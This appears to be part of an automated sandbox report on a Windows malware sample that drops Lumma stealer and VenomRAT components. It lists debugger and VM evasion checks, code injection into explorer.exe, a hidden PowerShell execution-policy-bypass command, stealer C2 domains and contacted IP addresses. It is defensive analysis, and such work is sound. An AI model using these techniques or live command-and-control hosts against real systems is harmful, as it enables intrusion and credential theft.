Source: explorer.exe, 00000001.00000000.1714271220.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: BD9E.exe, 0000000A.00000002.2908954783.000001DCE810D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\E
Source: vm.exe, 00000012.00000003.3217453872.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000012.00000002.4111529440.00000000005FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: 34CA.exe	Binary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
Source: explorer.exe, 00000001.00000000.1712692265.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1711065228.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1714271220.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1711065228.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 34CA.exe	Binary or memory string: W5Y0tdCLLaYcvsKzyKBjidpmE1BHc86vjlhun29UAQ6rJZ1+hAUJMv6yDSm77LFR/At8wqZArKFjRxye1Iekrog93ttnyK5FEDw6+RPvmPZJmn2Ny6c69E2SUhEO/vtkGH1tLlOBSTv07SHKhP/k6uLKuu96C1dMI7KMMDP4XkpI2+Y6DismsMB9BV85H06QXorwQF/T+HT6QsQfi/vOoJWQZYuU+4o6mvX48r/Ht0VEJcT/p2XyRwBvMciXpPpRvoj9

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	System information queried: CodeIntegrityInformation			Jump to behavior

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe

Code function: 10_2_00007FFD9B9A2DC5 CheckRemoteDebuggerPresent,

10_2_00007FFD9B9A2DC5

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process queried: DebugPort

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 13_2_00779D10 LdrInitializeThunk,

13_2_00779D10

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 18_2_6CA8DF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

18_2_6CA8DF8B

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

18_2_6CA764F0

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_026E092B mov eax, dword ptr fs:[00000030h]	0_2_026E092B
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_026E0D90 mov eax, dword ptr fs:[00000030h]	0_2_026E0D90
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_0273409B push dword ptr fs:[00000030h]	0_2_0273409B
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_0256092B mov eax, dword ptr fs:[00000030h]	3_2_0256092B
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_02560D90 mov eax, dword ptr fs:[00000030h]	3_2_02560D90
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_02593CBB push dword ptr fs:[00000030h]	3_2_02593CBB
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA8F853 mov eax, dword ptr fs:[00000030h]	18_2_6CA8F853
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA8D49D mov ecx, dword ptr fs:[00000030h]	18_2_6CA8D49D

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 18_2_6CA96CF0 GetProcessHeap,HeapAlloc,

18_2_6CA96CF0

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA8DF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_6CA8DF8B
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA88B9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_6CA88B9F
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 18_2_6CA890B9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_6CA890B9

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 2FBE.exe.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.139 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.137 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.235.84 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 109.172.114.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.113.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 78.89.199.216 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.235.128.153 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.12.87.61 80	Jump to behavior

.NET source code references suspicious native API functions

Source: BD9E.exe.1.dr, SAPIENHost.cs	Reference to suspicious API methods: FindResource(hINSTANCE, new IntPtr(num), new IntPtr(10))
Source: 18.2.vm.exe.29e0000.1.raw.unpack, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 18.2.vm.exe.29e0000.1.raw.unpack, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 18.2.vm.exe.29e0000.1.raw.unpack, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory allocated: C:\Windows\explorer.exe base: 3050000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory allocated: C:\Windows\explorer.exe base: 3040000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory allocated: C:\Windows\explorer.exe base: 3180000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory allocated: C:\Windows\explorer.exe base: 7E70000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 740000 protect: page execute and read and write	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"

Changes memory attributes in foreign processes to executable or writable

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe

Memory protected: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and write

Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Thread created: C:\Windows\explorer.exe EIP: 13519D0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Thread created: unknown EIP: 34319D0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\34CA.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 740000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory written: PID: 2580 base: 3050000 value: 20	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory written: PID: 2580 base: 3051000 value: 48	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory written: PID: 2580 base: 7E70030 value: 00	Jump to behavior

LummaC encrypted strings found

Source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: indexterityszcoxp.shop
Source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: lariatedzugspd.shop
Source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: callosallsaospz.shop
Source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: outpointsozp.shop
Source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: liernessfornicsa.shop
Source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: upknittsoappz.shop
Source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: shepherdlyopzc.shop
Source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: unseaffarignsk.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jjistfr	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory written: C:\Windows\explorer.exe base: 3050000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory written: C:\Windows\explorer.exe base: 3051000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Memory written: C:\Windows\explorer.exe base: 7E70030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 740000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A03008	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process created: C:\Users\user\AppData\Local\Temp\BD9E.exe "C:\Users\user\AppData\Local\Temp\BD9E.exe" -HOSTRUNAS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe

Code function: 6_2_00007FF7648DF310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership,

6_2_00007FF7648DF310

Source: explorer.exe, 00000001.00000000.1711355226.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1712531796.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714271220.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1711355226.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1711065228.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1711355226.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1711355226.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\BD9E.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
